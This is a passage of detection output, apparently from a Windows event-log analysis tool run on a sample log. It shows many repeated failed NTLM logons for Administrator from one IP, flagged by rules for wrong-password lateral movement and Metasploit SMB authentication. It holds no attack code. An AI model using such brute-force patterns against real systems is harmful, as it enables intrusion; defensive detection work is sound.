Password,User: Administrator : Type: 3 : Workstation: BNLdOrPwbvYELiCc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x15WKTspmg2ALHaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QMoQWddkcYtCmoKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jhTbfX42Pwn7OA2k : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yXcbUCgAhVFfqLc3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GHyXVM0jpaKBiY9N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TZoWEcU6VbEnrLpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LIfEzNQWwvrai4ga : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DhImfqWz7SHId9hE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s6sekQfneNE5uFtx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: iEQ6KkZEHGcSgdA8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qzxJYBbM7ZMaaGOo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wO5GFBqSltNfjtQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PdsMzjfP1ZcPju2i : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2LqpKmoCX9slPXie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ouHvw1LXTN3OSFYb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tZIB1QO7hfugceJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u4QU2BQ0u5tJsdjG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0P7NKiKCmLvu6L1L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4obkK4RfsLZe5gdi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: JRUDpDLhgop8d1el : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LvdsNkFqfFWRePXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5wvd8c1jYrEZMcKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AWvECxgkvWdg9Zdc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lHHPOAYSMSp3BhX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rJicXUMfrx9BOzHI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eybrQWvrvwSkNADJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VVMPCaQB0XteDSwC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lbjjLoATZE6KPIQv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tips954DRcYeIB2T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: nLe9aMiMz0akxfWW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: csroGB9KZOZkb5sY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Zl4Rc25RsvJ7Y9H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C5CxqCFOIJBMZCD6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gVPwxpR05F3B5aXp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nP317UkK2DhTD5Rd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ir3c7dqXm1LhbfqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1U1QZiJSrEufxF3b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HZnDnDhTPuC9n5A1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72gY1ClzwuisAhKW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: nrneLGOZCwPIeQgT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dm3gGV2yR4B3yrJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fzeklLG1KCTE5FpP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uZPwxCw3EWy9NShk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MalB3OcsOsRaMtS3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XMZMqCYPHO3n4RIh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1VUeIuU1rQPISNA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
